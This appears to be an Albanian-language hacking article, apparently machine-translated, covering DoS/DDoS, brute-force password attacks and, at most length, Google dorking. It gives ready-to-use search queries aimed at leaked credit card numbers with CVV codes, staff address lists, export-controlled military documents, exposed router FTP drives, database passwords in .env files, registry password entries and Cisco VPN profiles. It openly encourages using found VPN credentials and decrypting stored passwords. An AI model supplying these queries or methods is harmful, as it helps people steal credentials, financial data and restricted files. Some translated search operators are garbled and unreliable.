    DoS (nga anglishtja Denial of Service - mohimi i shërbimit) është një sulm hakeri në një sistem kompjuterik me qëllim që të shkaktojë dështimin e tij. Kjo është krijimi i kushteve në të cilat përdoruesit e sistemit me mirëbesim nuk mund të aksesojnë burimet e sistemit të ofruar (serverët), ose kjo qasje është e vështirë. Një dështim i sistemit mund të jetë gjithashtu një hap drejt marrjes së tij nëse, në një situatë emergjente, softueri prodhon ndonjë informacion kritik: për shembull, një version, një pjesë të një kodi programi, etj. Por më shpesh kjo është një masë e presionit ekonomik: humbja e një shërbimi të thjeshtë që gjeneron të ardhura. Faturat nga ofruesi ose masat për të shmangur një sulm godasin ndjeshëm "objektivin" në xhep. Aktualisht, sulmet DoS dhe DDoS janë më të njohurit, pasi ato lejojnë pothuajse çdo sistem të dështojë pa lënë prova të rëndësishme ligjërisht.

    Cili është ndryshimi midis sulmit DoS dhe DDos?

    DoS është një sulm i krijuar në një mënyrë të zgjuar. Për shembull, nëse serveri nuk kontrollon korrektësinë e paketave hyrëse, atëherë një haker mund të bëjë një kërkesë që do të marrë përgjithmonë për t'u përpunuar dhe nuk do të ketë kohë të mjaftueshme të procesorit për të punuar me lidhje të tjera. Prandaj, klientëve do t'u refuzohet shërbimi. Por nuk do të jetë e mundur të mbingarkoni ose çaktivizoni faqet e mëdha të njohura në këtë mënyrë. Ata janë të armatosur me kanale mjaft të gjera dhe serverë super të fuqishëm që mund të përballojnë një mbingarkesë të tillë pa asnjë problem.

    DDoS është në të vërtetë i njëjti sulm si DoS. Por nëse në DoS ka një paketë kërkesash, atëherë në DDoS mund të ketë qindra ose më shumë prej tyre. Edhe serverët super të fuqishëm mund të mos jenë në gjendje të përballojnë një mbingarkesë të tillë. Më lejoni t'ju jap një shembull.

    Një sulm DoS është kur jeni duke biseduar me dikë, por më pas vjen një person i keq dhe fillon të bërtasë me zë të lartë. Është ose e pamundur ose shumë e vështirë të flasësh. Zgjidhja: telefononi sigurimin, i cili do të qetësojë dhe largojë personin nga ambientet. Sulmet DDoS ndodhin kur një turmë me mijëra njerëz të tillë të paedukuar nxiton. Në këtë rast sigurimi nuk do të mund t'i lidhë të gjithë dhe t'i largojë.

    DoS dhe DDoS kryhen nga kompjuterët, të ashtuquajturit zombies. Këta janë kompjuterë të përdoruesve të hakeruar nga hakerat, të cilët as nuk dyshojnë se makina e tyre po merr pjesë në një sulm ndaj ndonjë serveri.

    Si të mbroheni nga kjo? Në përgjithësi, në asnjë mënyrë. Por ju mund t'i bëni gjërat më të vështira për një haker. Për ta bërë këtë, ju duhet të zgjidhni një host të mirë me serverë të fuqishëm.

    Sulmi Bruteforce

    Një zhvillues mund të krijojë shumë sisteme të mbrojtjes nga sulmet, të rishikojë plotësisht skriptet që kemi shkruar, të kontrollojë faqen për dobësi, etj. Por kur ai arrin në hapin e fundit të paraqitjes së faqes në internet, domethënë kur thjesht vendos një fjalëkalim për panelin e administratorit, ai mund të harrojë një gjë. Fjalëkalimi!

    Nuk rekomandohet rreptësisht vendosja e një fjalëkalimi të thjeshtë. Kjo mund të jetë 12345, 1114457, vasya111, etj. Nuk rekomandohet të vendosni fjalëkalime me gjatësi më të vogël se 10-11 karaktere. Përndryshe, ju mund t'i nënshtroheni sulmit më të zakonshëm dhe të pakomplikuar - Forcës brutale.

    Brute force është një sulm i kërkimit të fjalëkalimit në fjalor duke përdorur programe speciale. Fjalorët mund të jenë të ndryshëm: latinisht, numërimi me numra, të themi, deri në një gamë të caktuar, të përzier (latinisht + numra), madje ka fjalorë me karaktere unike @#4$%&*~~`”\ ? etj.

    Sigurisht, ky lloj sulmi është i lehtë për t'u shmangur. Gjithçka që duhet të bëni është të gjeni një fjalëkalim kompleks. Edhe një captcha mund t'ju shpëtojë. Gjithashtu, nëse faqja juaj është krijuar në një CMS, atëherë shumë prej tyre zbulojnë këtë lloj sulmi dhe bllokojnë IP-në. Duhet të mbani mend gjithmonë se sa më shumë karaktere të ndryshme në një fjalëkalim, aq më e vështirë është të hamendësohet.

    Si funksionojnë hakerat? Në shumicën e rasteve, ata ose dyshojnë ose e dinë paraprakisht një pjesë të fjalëkalimit. Është mjaft logjike të supozohet se fjalëkalimi i përdoruesit me siguri nuk do të përbëhet nga 3 ose 5 karaktere. Fjalëkalime të tilla çojnë në hakerime të shpeshta. Në thelb, hakerët marrin një gamë prej 5 deri në 10 karaktere dhe shtojnë disa karaktere që mund t'i dinë paraprakisht. Më pas, krijohen fjalëkalime me diapazonin e kërkuar. Shpërndarja Kali Linux madje ka programe për raste të tilla. Dhe voila, sulmi nuk do të zgjasë më shumë, pasi vëllimi i fjalorit nuk është më aq i madh. Përveç kësaj, një haker mund të përdorë fuqinë e kartës video. Disa prej tyre mbështesin sistemin CUDA, dhe shpejtësia e kërkimit rritet deri në 10 herë. Dhe tani shohim se një sulm në një mënyrë kaq të thjeshtë është mjaft real. Por nuk janë vetëm faqet e internetit që i nënshtrohen forcës brutale.

    Të nderuar zhvillues, mos harroni kurrë sistemin e sigurisë së informacionit, sepse sot shumë njerëz, përfshirë shtetet, vuajnë nga sulme të tilla. Në fund të fundit, dobësia më e madhe është një person që gjithmonë mund të shpërqendrohet diku ose të humbasë diçka. Ne jemi programues, por jo makina të programuara. Jini gjithmonë vigjilentë, sepse humbja e informacionit mund të ketë pasoja të rënda!

    Marrja e të dhënave private nuk do të thotë gjithmonë hakerim - ndonjëherë ato publikohen publikisht. Njohja e cilësimeve të Google dhe pak zgjuarsi do t'ju lejojnë të gjeni shumë gjëra interesante - nga numrat e kartave të kreditit deri te dokumentet e FBI-së.

    PARALAJMËRIM I gjithë informacioni jepet vetëm për qëllime informative. As redaktorët dhe as autori nuk janë përgjegjës për ndonjë dëm të mundshëm të shkaktuar nga materialet e këtij artikulli.

    Sot, gjithçka është e lidhur me internetin, me pak shqetësim për kufizimin e aksesit. Prandaj, shumë të dhëna private bëhen pre e motorëve të kërkimit. Robotët merimangë nuk janë më të kufizuar në faqet e internetit, por indeksojnë të gjithë përmbajtjen e disponueshme në internet dhe vazhdimisht shtojnë informacione jo publike në bazat e të dhënave të tyre. Zbulimi i këtyre sekreteve është i lehtë - thjesht duhet të dini se si të pyesni për to.

    Duke kërkuar për skedarë

    Në duar të afta, Google do të gjejë shpejt gjithçka që nuk gjendet në internet, për shembull, informacione personale dhe skedarë për përdorim zyrtar. Ato shpesh fshihen si një çelës nën një qilim: nuk ka kufizime reale të aksesit, të dhënat thjesht qëndrojnë në pjesën e pasme të faqes, ku nuk çojnë asnjë lidhje. Ndërfaqja standarde e uebit e Google ofron vetëm cilësime themelore të kërkimit të avancuar, por edhe këto do të jenë të mjaftueshme.

    Ju mund ta kufizoni kërkimin tuaj në Google në një lloj skedari specifik duke përdorur dy operatorë: lloji i skedarit dhe ext . E para specifikon formatin që motori i kërkimit përcaktoi nga titulli i skedarit, i dyti specifikon shtrirjen e skedarit, pavarësisht nga përmbajtja e tij e brendshme. Kur kërkoni në të dyja rastet, duhet vetëm të specifikoni shtrirjen. Fillimisht, operatori ext ishte i përshtatshëm për t'u përdorur në rastet kur skedari nuk kishte karakteristika specifike të formatit (për shembull, për të kërkuar skedarë të konfigurimit ini dhe cfg, të cilat mund të përmbajnë çdo gjë). Tani algoritmet e Google kanë ndryshuar dhe nuk ka asnjë ndryshim të dukshëm midis operatorëve - në shumicën e rasteve rezultatet janë të njëjta.


    Filtrimi i rezultateve

    Si parazgjedhje, Google kërkon fjalë dhe, në përgjithësi, çdo karakter të futur në të gjithë skedarët në faqet e indeksuara. Mund ta kufizoni zonën e kërkimit sipas domenit të nivelit të lartë, një sajti të caktuar ose sipas vendndodhjes së sekuencës së kërkimit në vetë skedarët. Për dy opsionet e para, përdorni operatorin e faqes, i ndjekur nga emri i domenit ose faqes së zgjedhur. Në rastin e tretë, një grup i tërë operatorësh ju lejon të kërkoni informacion në fushat e shërbimit dhe metadatat. Për shembull, allinurl do ta gjejë atë të dhënë në trupin e vetë lidhjeve, allinanchor - në tekstin e pajisur me etiketën , allintitle - në titujt e faqeve, allintext - në trupin e faqeve.

    Për secilin operator ekziston një version i lehtë me një emër më të shkurtër (pa prefiksin të gjithë). Dallimi është se allinurl do të gjejë lidhje me të gjitha fjalët, dhe inurl do të gjejë lidhje vetëm me të parën prej tyre. Fjalët e dyta dhe të mëvonshme nga pyetja mund të shfaqen kudo në faqet e internetit. Operatori inurl gjithashtu ndryshon nga një operator tjetër me një kuptim të ngjashëm - faqe. E para gjithashtu ju lejon të gjeni çdo sekuencë karakteresh në një lidhje me dokumentin e kërkuar (për shembull, /cgi-bin/), i cili përdoret gjerësisht për të gjetur komponentë me dobësi të njohura.

    Le ta provojmë në praktikë. Ne marrim filtrin allintext dhe bëjmë që kërkesa të prodhojë një listë me numra dhe kode verifikimi të kartave të kreditit që do të skadojnë vetëm pas dy vjetësh (ose kur pronarët e tyre të lodhen duke ushqyer të gjithë).

    Allintext: data e skadimit të numrit të kartës /2017 cvv

    Kur lexoni në lajme se një haker i ri "hakoi në serverët" e Pentagonit ose NASA-s, duke vjedhur informacione të klasifikuara, në shumicën e rasteve po flasim për një teknikë kaq bazë të përdorimit të Google. Supozoni se jemi të interesuar për një listë të punonjësve të NASA-s dhe informacionin e kontaktit të tyre. Sigurisht që një listë e tillë është e disponueshme në formë elektronike. Për lehtësi ose për shkak të mbikëqyrjes, mund të jetë edhe në faqen e internetit të vetë organizatës. Është logjike që në këtë rast nuk do të ketë lidhje me të, pasi është menduar për përdorim të brendshëm. Cilat fjalë mund të jenë në një skedar të tillë? Së paku - fusha "adresa". Testimi i të gjitha këtyre supozimeve është i lehtë.


    Inurl:nasa.gov lloji i skedarit:xlsx "adresa"


    Ne përdorim burokracinë

    Gjetjet si kjo janë një prekje e këndshme. Një kapje vërtet solide sigurohet nga një njohuri më e detajuar e operatorëve të Google për webmasterët, vetë Rrjeti dhe veçoritë e strukturës së asaj që kërkohet. Duke ditur detajet, ju lehtë mund të filtroni rezultatet dhe të përsosni vetitë e skedarëve të nevojshëm në mënyrë që të merrni të dhëna vërtet të vlefshme në pjesën tjetër. Është për të qeshur që burokracia vjen në shpëtim këtu. Ai prodhon formulime standarde që janë të përshtatshme për të kërkuar informacione sekrete të rrjedhura aksidentalisht në internet.

    Për shembull, vula e deklaratës së shpërndarjes, e kërkuar nga Departamenti i Mbrojtjes i SHBA-së, nënkupton kufizime të standardizuara në shpërndarjen e një dokumenti. Shkronja A tregon publikimet publike në të cilat nuk ka asgjë sekrete; B - i destinuar vetëm për përdorim të brendshëm, C - rreptësisht konfidencial, e kështu me radhë derisa F. Shquhet veçmas shkronja X, e cila shënon një informacion veçanërisht të vlefshëm që përfaqëson një sekret shtetëror të nivelit më të lartë. Le të kërkojnë dokumente të tilla ata që supozohet ta bëjnë këtë në detyrë dhe ne do të kufizohemi në dosjet me shkronjën C. Sipas direktivës DoDI 5230.24, kjo shenjë u caktohet dokumenteve që përmbajnë një përshkrim të teknologjive kritike që bien nën kontrollin e eksportit . Ju mund të gjeni informacione të tilla të mbrojtura me kujdes në faqet në domain.mil të nivelit të lartë, të ndara për ushtrinë amerikane.

    "DEKLARATA E SHPËRNDARJES C" inurl:navy.mil

    Është shumë e përshtatshme që domeni .mil të përmbajë vetëm faqe nga Departamenti i Mbrojtjes i SHBA-së dhe organizatat e tij kontraktuale. Rezultatet e kërkimit me një kufizim domeni janë jashtëzakonisht të pastra dhe titujt flasin vetë. Kërkimi i sekreteve ruse në këtë mënyrë është praktikisht i padobishëm: kaosi mbretëron në domains.ru dhe.rf, dhe emrat e shumë sistemeve të armëve tingëllojnë si ato botanike (PP "Kiparis", armë vetëlëvizëse "Akatsia") apo edhe përrallore ( TOS “Buratino”).


    Duke studiuar me kujdes çdo dokument nga një sajt në domenin .mil, mund të shihni shënues të tjerë për të përmirësuar kërkimin tuaj. Për shembull, një referencë për kufizimet e eksportit "Sec 2751", e cila është gjithashtu e përshtatshme për të kërkuar informacione teknike interesante. Herë pas here hiqet nga faqet zyrtare ku është shfaqur dikur, kështu që nëse nuk mund të ndiqni një lidhje interesante në rezultatet e kërkimit, përdorni cache-in e Google (operatorin e memorjes së fshehtë) ose faqen e Arkivit të Internetit.

    Duke u ngjitur në retë

    Përveç dokumenteve qeveritare të deklasifikuara aksidentalisht, lidhjet me skedarët personalë nga Dropbox dhe shërbime të tjera të ruajtjes së të dhënave që krijojnë lidhje "private" me të dhënat e publikuara publikisht shfaqen herë pas here në memorien e Google. Është edhe më keq me shërbimet alternative dhe të bëra vetë. Për shembull, pyetja e mëposhtme gjen të dhëna për të gjithë klientët e Verizon që kanë të instaluar një server FTP dhe përdorin në mënyrë aktive ruterin e tyre.

    Allinurl:ftp://verizon.net

    Tani ka më shumë se dyzet mijë njerëz të tillë të zgjuar, dhe në pranverën e 2015 kishte shumë më tepër prej tyre. Në vend të Verizon.net, mund të zëvendësoni emrin e çdo ofruesi të mirënjohur, dhe sa më i famshëm të jetë, aq më i madh mund të jetë kapja. Nëpërmjet serverit të integruar FTP, mund të shihni skedarë në një pajisje ruajtëse të jashtme të lidhur me ruterin. Zakonisht ky është një NAS për punë në distancë, një re personale ose një lloj shkarkimi skedarësh nga kolegët. Të gjitha përmbajtjet e mediave të tilla indeksohen nga Google dhe motorë të tjerë kërkimi, kështu që ju mund të përdorni skedarët e ruajtur në disqet e jashtme nëpërmjet një lidhjeje të drejtpërdrejtë.

    Duke parë konfigurimet

    Para migrimit të gjerë në cloud, serverët e thjeshtë FTP sundonin si ruajtje në distancë, të cilat gjithashtu kishin shumë dobësi. Shumë prej tyre janë ende të rëndësishme sot. Për shembull, programi i njohur WS_FTP Professional ruan të dhënat e konfigurimit, llogaritë e përdoruesve dhe fjalëkalimet në skedarin ws_ftp.ini. Është e lehtë për t'u gjetur dhe lexuar, pasi të gjitha regjistrimet ruhen në format teksti dhe fjalëkalimet janë të koduara me algoritmin Triple DES pas errësimit minimal. Në shumicën e versioneve, thjesht heqja e bajtit të parë është e mjaftueshme.

    Është e lehtë të deshifrosh fjalëkalime të tilla duke përdorur mjetin WS_FTP Password Decryptor ose një shërbim falas në internet.

    Kur flasim për hakimin e një faqe interneti arbitrare, ato zakonisht nënkuptojnë marrjen e një fjalëkalimi nga regjistrat dhe kopjet rezervë të skedarëve të konfigurimit të CMS ose aplikacioneve të tregtisë elektronike. Nëse e dini strukturën e tyre tipike, mund të tregoni lehtësisht fjalët kyçe. Linjat si ato që gjenden në ws_ftp.ini janë jashtëzakonisht të zakonshme. Për shembull, në Drupal dhe PrestaShop ka gjithmonë një identifikues përdoruesi (UID) dhe një fjalëkalim përkatës (pwd), dhe të gjitha informacionet ruhen në skedarë me shtesën .inc. Ju mund t'i kërkoni ato si më poshtë:

    "pwd=" "UID=" ext:inc

    Zbulimi i fjalëkalimeve të DBMS

    Në skedarët e konfigurimit të serverëve SQL, emrat e përdoruesve dhe adresat e postës elektronike ruhen në tekst të qartë dhe haset e tyre MD5 shkruhen në vend të fjalëkalimeve. Me fjalë të rrepta, është e pamundur t'i deshifrosh ato, por mund të gjesh një përputhje midis çifteve të njohura hash-password.

    Ka ende DBMS që nuk përdorin as hashimin e fjalëkalimeve. Skedarët e konfigurimit të secilit prej tyre thjesht mund të shikohen në shfletues.

    Inteksti:DB_PASSWORD lloji i skedarit: env

    Me ardhjen e serverëve Windows, vendi i skedarëve të konfigurimit u zu pjesërisht nga regjistri. Ju mund të kërkoni nëpër degët e tij në të njëjtën mënyrë, duke përdorur reg si lloj skedari. Për shembull, si kjo:

    Lloji i skedarit:reg HKEY_CURRENT_USER "Fjalëkalimi"=

    Të mos harrojmë të dukshmen

    Ndonjëherë është e mundur të arrihet tek informacioni i klasifikuar duke përdorur të dhëna që janë hapur aksidentalisht dhe kanë rënë në vëmendjen e Google. Opsioni ideal është të gjeni një listë të fjalëkalimeve në një format të zakonshëm. Vetëm njerëzit e dëshpëruar mund të ruajnë informacionin e llogarisë në një skedar teksti, dokument Word ose spreadsheet Excel, por gjithmonë ka mjaft prej tyre.

    Lloji i skedarit:xls inurl:fjalëkalimi

    Nga njëra anë, ka shumë mjete për të parandaluar incidente të tilla. Është e nevojshme të specifikoni të drejta adekuate të aksesit në htaccess, të rregulloni CMS-në, të mos përdorni skripta të majtë dhe të mbyllni vrima të tjera. Ekziston gjithashtu një skedar me një listë përjashtimesh robots.txt që i ndalon motorët e kërkimit të indeksojnë skedarët dhe drejtoritë e specifikuara në të. Nga ana tjetër, nëse struktura e robots.txt në ndonjë server ndryshon nga ajo standarde, atëherë menjëherë bëhet e qartë se çfarë po përpiqen të fshehin në të.

    Lista e drejtorive dhe skedarëve në çdo sajt paraprihet nga indeksi standard i. Meqenëse për qëllime shërbimi duhet të shfaqet në titull, ka kuptim që kërkimi i tij të kufizohet në operatorin e titullit. Gjëra interesante janë në drejtoritë /admin/, /personal/, /etc/ madje edhe /secret/.

    Qëndroni të sintonizuar për përditësime

    Rëndësia është jashtëzakonisht e rëndësishme këtu: dobësitë e vjetra mbyllen shumë ngadalë, por Google dhe rezultatet e kërkimit të tij po ndryshojnë vazhdimisht. Madje ka një ndryshim midis një filtri "sekondën e fundit" (&tbs=qdr:s në fund të URL-së së kërkesës) dhe një filtri "në kohë reale" (&tbs=qdr:1).

    Intervali kohor i datës së përditësimit të fundit të skedarit tregohet gjithashtu në mënyrë implicite nga Google. Nëpërmjet ndërfaqes grafike të ueb-it, mund të zgjidhni një nga periudhat standarde (orë, ditë, javë, etj.) ose të vendosni një interval datash, por kjo metodë nuk është e përshtatshme për automatizim.

    Nga pamja e shiritit të adresave, mund të merrni me mend vetëm një mënyrë për të kufizuar daljen e rezultateve duke përdorur ndërtimin &tbs=qdr:. Shkronja y pasi vendos kufirin e një viti (&tbs=qdr:y), m tregon rezultatet për muajin e fundit, w - për javën, d - për ditën e kaluar, h - për orën e fundit, n - për minutë, dhe s - për më jep një sekondë. Rezultatet më të fundit që Google sapo ka bërë të njohura janë gjetur duke përdorur filtrin &tbs=qdr:1 .

    Nëse keni nevojë të shkruani një skenar të zgjuar, do të jetë e dobishme të dini se diapazoni i datave është vendosur në Google në formatin Julian duke përdorur operatorin datarange. Për shembull, kështu mund të gjeni një listë të dokumenteve PDF me fjalën konfidenciale, të shkarkuar nga 1 janari deri më 1 korrik 2015.

    Lloji i skedarit konfidencial: pdf datarange:2457024-2457205

    Gama tregohet në formatin e datës Julian pa marrë parasysh pjesën e pjesshme. Përkthimi i tyre me dorë nga kalendari Gregorian është i papërshtatshëm. Është më e lehtë të përdorësh një konvertues datash.

    Synimi dhe filtrimi përsëri

    Përveç specifikimit të operatorëve shtesë në pyetjen e kërkimit, ata mund të dërgohen drejtpërdrejt në trupin e lidhjes. Për shembull, specifikimi filetype:pdf korrespondon me konstruksionin as_filetype=pdf. Kjo e bën të përshtatshëm për të kërkuar ndonjë sqarim. Le të themi se dalja e rezultateve vetëm nga Republika e Hondurasit specifikohet duke shtuar konstruksionin cr=countryHN në URL-në e kërkimit, dhe vetëm nga qyteti i Bobruisk - gcs=Bobruisk. Ju mund të gjeni një listë të plotë në seksionin e zhvilluesve.

    Mjetet e automatizimit të Google janë krijuar për ta bërë jetën më të lehtë, por ato shpesh shtojnë probleme. Për shembull, qyteti i përdoruesit përcaktohet nga IP-ja e përdoruesit përmes WHOIS. Bazuar në këtë informacion, Google jo vetëm që balancon ngarkesën midis serverëve, por gjithashtu ndryshon rezultatet e kërkimit. Në varësi të rajonit, për të njëjtën kërkesë, në faqen e parë do të shfaqen rezultate të ndryshme dhe disa prej tyre mund të jenë plotësisht të fshehura. Kodi me dy shkronja pas direktivës gl=country do t'ju ndihmojë të ndiheni si një kozmopolit dhe të kërkoni informacione nga çdo vend. Për shembull, kodi i Holandës është NL, por Vatikani dhe Koreja e Veriut nuk kanë kodin e tyre në Google.

    Shpesh, rezultatet e kërkimit përfundojnë të rrëmujshme edhe pas përdorimit të disa filtrave të avancuar. Në këtë rast, është e lehtë të sqarohet kërkesa duke shtuar disa fjalë përjashtimore në të (një shenjë minus vendoset përpara secilës prej tyre). Për shembull, bankat, emrat dhe tutoriali përdoren shpesh me fjalën Personal. Prandaj, rezultatet më të pastra të kërkimit do të shfaqen jo nga një shembull i një teksti shkollor të një pyetjeje, por nga një i rafinuar:

    Titulli:"Indeksi i /Personal/" -emrat -tutorial -bankare

    Një shembull i fundit

    Një haker i sofistikuar dallohet nga fakti se i siguron vetes gjithçka që i nevojitet vetë. Për shembull, VPN është një gjë e përshtatshme, por ose e shtrenjtë, ose e përkohshme dhe me kufizime. Regjistrimi për një abonim për veten tuaj është shumë i shtrenjtë. Është mirë që ka abonime në grup dhe me ndihmën e Google është e lehtë të bëhesh pjesë e një grupi. Për ta bërë këtë, thjesht gjeni skedarin e konfigurimit të Cisco VPN, i cili ka një shtrirje PCF mjaft jo standarde dhe një shteg të njohur: Program Files\Cisco Systems\VPN Client\Profiles. Një kërkesë dhe ju bashkoheni, për shembull, në ekipin miqësor të Universitetit të Bonit.

    Lloji i skedarit: pcf vpn OSE Grupi

    INFO Google gjen skedarë konfigurimi me fjalëkalime, por shumë prej tyre janë shkruar në formë të koduar ose zëvendësuar me hash. Nëse shihni vargje me një gjatësi fikse, atëherë kërkoni menjëherë një shërbim deshifrimi.

    Fjalëkalimet ruhen të enkriptuara, por Maurice Massard ka shkruar tashmë një program për t'i deshifruar ato dhe e ofron atë falas përmes thecampusgeeks.com.

    Google kryen qindra lloje të ndryshme sulmesh dhe teste depërtimi. Ka shumë opsione që prekin programet e njohura, formatet kryesore të bazës së të dhënave, dobësitë e shumta të PHP, retë, e kështu me radhë. Njohja e saktë e asaj që po kërkoni do ta bëjë shumë më të lehtë gjetjen e informacionit që ju nevojitet (veçanërisht informacionin që nuk keni ndërmend t'i bëni publike). Shodan nuk është i vetmi që ushqehet me ide interesante, por çdo bazë të dhënash të burimeve të rrjetit të indeksuar!

    Artikujt më të mirë mbi këtë temë